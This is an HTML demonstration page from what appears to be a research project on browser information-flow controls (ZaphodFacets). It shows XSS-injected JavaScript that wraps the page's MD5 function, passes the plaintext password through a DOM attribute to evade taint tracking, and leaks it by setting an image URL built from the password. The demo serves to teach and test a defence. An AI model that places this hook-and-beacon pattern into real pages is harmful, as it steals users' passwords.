<html>
<meta charset="UTF-8">
<head>
  <title>Password example</title>
  <meta http-equiv="Content-Script-Type" content="application/javascript" />
  <script type='application/javascript' src='./md5.js'> </script>
  <script>
  // Secret data that should really only be available to the server side.
  // Simulating it here client side.
  const PWD_HASH = hex_md5('marsupial');
  </script>
</head>
<body>
  <h1 id='title1'>Password theft</h1>
  <!--
  <p>
  For a somewhat more realistic example, we use a hashing function written in JavaScript
  (courtesy of http://pajhome.org.uk/crypt/md5).
  In this context, only the hash of the user's password would be sent across the network.
  However, there is a risk that an attacker injected code through an XSS vulnerability,
  and is attempting to wrap that function to steal the password.
  To leak data, the attacker may load an image from an external server, using code similar to the following:
  </p>
  <pre>
  img.setAttribute('src', baseURL + secret + '.jpg');
  </pre>
  <p>
  Typically, the attacker would load a 1 pixel image or something similar.
  In this case, we use images of spock to make it more obvious what is happening.
  If you enter in <strong>'marsupial'</strong>,
  then a picture of evil spock will load if you do not have any controls in place.
  With the information flow controls in <a href='https://github.com/taustin/ZaphodFacets'>ZaphodFacets</a>,
  a picture of good spock will load, indicating that the attacker thinks the password is 'default'.
  </p>
  <p>
  This addon enforces a very simplistic policy that password elements should always be tainted.
  A crucial benefit of using dom.js is that the taint on values is persisted throughout the DOM.
  Without dom.js, the analyses must reason separately about the DOM,
  an error-prone, complex process that is likely to leave many open holes for an attacker to exploit.
  If your view the code on this page, you will see that the 'injected' code attempts to scrub
  the password value by storing it in the DOM.
  </p>
  <p>
  <strong>Be sure that the modified version of Zaphod is installed and active.</strong>
  You should see a small, red mozilla logo at the bottom right of your browser.
  </p>
  -->
  <!-- INJECTED CODE!!! -->
  <script type='application/javascript'>
  var oldHex = hex_md5;
  hex_md5 = function(secret) {
    var baseURL = 'http://localhost/'
    var img = document.getElementById('spock');
    var title1 = document.getElementById('title1');
    title1.setAttribute('class', secret);
    var newVal = document.getElementsByTagName('h1')[0].getAttribute('class');
    img.setAttribute('src', baseURL + newVal + '.jpg');
    return oldHex(secret);
  }
  </script>

  <form id="slugform" method="POST" action="">
  <label>Password</label>
  <input id="pass" type="password" name="password" />
  <br />
  <input id='passBut' type="submit" value="submit" name="submitMe" />
  </form>
  <script type='application/javascript' src='./password.js'> </script>
  <img id='spock' src='ucsc_banana_slug.jpg' width=300 height=300 />
</body>
</html>
